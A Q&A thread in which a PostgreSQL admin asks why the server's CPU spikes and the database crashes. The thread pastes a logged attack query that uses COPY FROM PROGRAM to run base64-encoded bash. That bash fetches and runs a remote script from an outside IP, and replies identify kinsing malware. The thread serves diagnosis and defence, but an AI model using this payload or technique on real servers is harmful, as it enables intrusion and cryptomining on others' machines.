# Unwanted query executed in Postgresql

Tags: postgresql, azure-virtual-machine, postgresql-12

I have recently moved my database from azure to self-hosted postgresql.
But the VM utilization of database server spikes upto 100% and stays at the same for hours even though no heavy operations are being performed.
After that, the database shuts down. This is happening at regular interval.

Resized the database to higher configuration and since then utilization goes upto 50% and stays there but the database get shut down.

After checking the logs, found this query being executed which is not at all related to my project.

```
postgres@postgres STATEMENT:  DROP TABLE IF EXISTS UofsVBqD;
CREATE TABLE UofsVBqD(cmd_output text);
COPY UofsVBqD FROM PROGRAM 
'echo IyEvYmluL2Jhc2gKcGtpbGwgLWYgenN2Ywpwa2lsbCAtZiBwZGVmZW5kZXJkCnBraWxsIC1mIHVwZGF0ZWNoZWNrZXJkCgpmdW5jdGlvbiBfX2N1cmwoKSB7CiAgcmVhZCBwcm90byBzZXJ2ZXIgcGF0aCA8PDwkKGVjaG8gJHsxLy8vLyB9KQogIERPQz0vJHtwYXRoLy8gLy99CiAgSE9TVD0ke3NlcnZlci8vOip9CiAgUE9SVD0ke3NlcnZlci8vKjp9CiAgW1sgeCIke0hPU1R9IiA9PSB4IiR7UE9SVH0iIF1dICYmIFBPUlQ9ODAKCiAgZXhlYyAzPD4vZGV2L3RjcC8ke0hPU1R9LyRQT1JUCiAgZWNobyAtZW4gIkdFVCAke0RPQ30gSFRUUC8xLjBcclxuSG9zdDogJHtIT1NUfVxyXG5cclxuIiA+JjMKICAod2hpbGUgcmVhZCBsaW5lOyBkbwogICBbWyAiJGxpbmUiID09ICQnXHInIF1dICYmIGJyZWFrCiAgZG9uZSAmJiBjYXQpIDwmMwogIGV4ZWMgMz4mLQp9CgppZiBbIC14ICIkKGNvbW1hbmQgLXYgY3VybCkiIF07IHRoZW4KICBjdXJsIDE5NC40MC4yNDMuMjA1L3BnLnNofGJhc2gKZWxpZiBbIC14ICIkKGNvbW1hbmQgLXYgd2dldCkiIF07IHRoZW4KICB3Z2V0IC1xIC1PLSAxOTQuNDAuMjQzLjIwNS9wZy5zaHxiYXNoCmVsc2UKICBfX2N1cmwgaHR0cDovLzE5NC40MC4yNDMuMjA1L3BnMi5zaHxiYXNoCmZp|base64 -d|bash';
SELECT * FROM UofsVBqD;
DROP TABLE IF EXISTS UofsVBqD;
```

Here I am attaching logs of the spikes[image: logs for lst 7 days. regular spikes of going upto 100%. after that I increased the size of VM and it goes upto 50% of utilization and is constant there]

Comment: you have been hacked

Comment: See e.g. https://stackoverflow.com/questions/50149034/user-postgres-launches-process-that-takes-all-cpus-100-usage

Answer (score 0):

In my case, my database had kinsing malware which was consuming all the resoures. You can check for some files for root user.